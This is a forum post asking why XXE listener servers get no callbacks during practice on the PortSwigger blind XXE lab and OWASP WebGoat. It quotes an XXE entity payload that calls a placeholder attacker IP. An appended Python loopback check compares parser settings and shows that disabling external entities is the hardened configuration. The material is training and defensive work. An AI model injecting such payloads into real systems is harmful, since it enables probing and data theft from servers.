Trouble testing XXE server


Cherry_Sec

I want to test if servers like xxe-ftp-server or xxeserv can work to receive HTTP requests and transfer DTDs. However, I have so far been unable to get either to work when testing on things like OWASP WebGoat or the blind XXE lab by PortSwigger. For example: on the PortSwigger XXE lab, I intercept the correct XML POST request and add

<!DOCTYPE stockCheck [
  <!ENTITY ping SYSTEM "http://MY_IP:80/"> 
]>

and then replace the content of the productID tag with &ping; (like it states in the solution). Using either of the mentioned servers results in the same thing, the PortSwigger server responding with 'parsing error' while my XXE servers don't pick up on any traffic at all. If this is just because of how the servers I'm attacking are set up, then can anyone suggest anything I could test against that would allow me to get a result from my XXE servers?


Ah, sorry, I just realized I didn't word that well. Basically I'm asking if anyone could either give me an idea as to why my XXE servers are not picking anything up (like is there something wrong with my inserted DTD) or, if the problem is simply because of how OWASP WebGoat and the blind XXE lab are set up, could anyone suggest something I could test XXE on that would allow me to use the mentioned XXE servers?

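A loopback check of the setup described in the posts above, added here as an example and not part of the original thread: it parses the stockCheck document with Python's xml.sax, once with external general entities enabled and once with them disabled, and returns the requests a local listener received. The listener, the 127.0.0.1 address, the `callbacks_seen` name and the single-element document body are assumptions made for the example.

```python
import io
import os
import threading
import xml.sax
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed sample: the DOCTYPE from the post, pointed at a loopback listener.
DOC = """<?xml version="1.0"?>
<!DOCTYPE stockCheck [
  <!ENTITY ping SYSTEM "http://127.0.0.1:{port}/">
]>
<stockCheck><productID>&ping;</productID></stockCheck>"""


def callbacks_seen(resolve_external: bool) -> list:
    """Parse DOC and return the request paths the loopback listener received."""
    seen = []

    class Listener(BaseHTTPRequestHandler):
        def do_GET(self):
            seen.append(self.path)
            self.send_response(200)
            self.send_header("Content-Length", "1")
            self.end_headers()
            self.wfile.write(b"1")

        def log_message(self, *args):  # keep stderr quiet
            pass

    os.environ["no_proxy"] = "*"  # do not route the loopback fetch via a proxy
    server = HTTPServer(("127.0.0.1", 0), Listener)  # port 0: OS picks a free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        parser = xml.sax.make_parser()
        # Hardened setting is False (the default since Python 3.7.1).
        parser.setFeature(feature_external_ges, resolve_external)
        parser.setContentHandler(ContentHandler())
        doc = DOC.format(port=server.server_address[1]).encode()
        try:
            parser.parse(io.BytesIO(doc))
        except xml.sax.SAXException:
            pass  # a parse error does not change what the listener saw
    finally:
        server.shutdown()
        server.server_close()
    return seen
```

With the feature disabled the parser skips the entity without any network activity, which is the hardened configuration for code that handles untrusted XML.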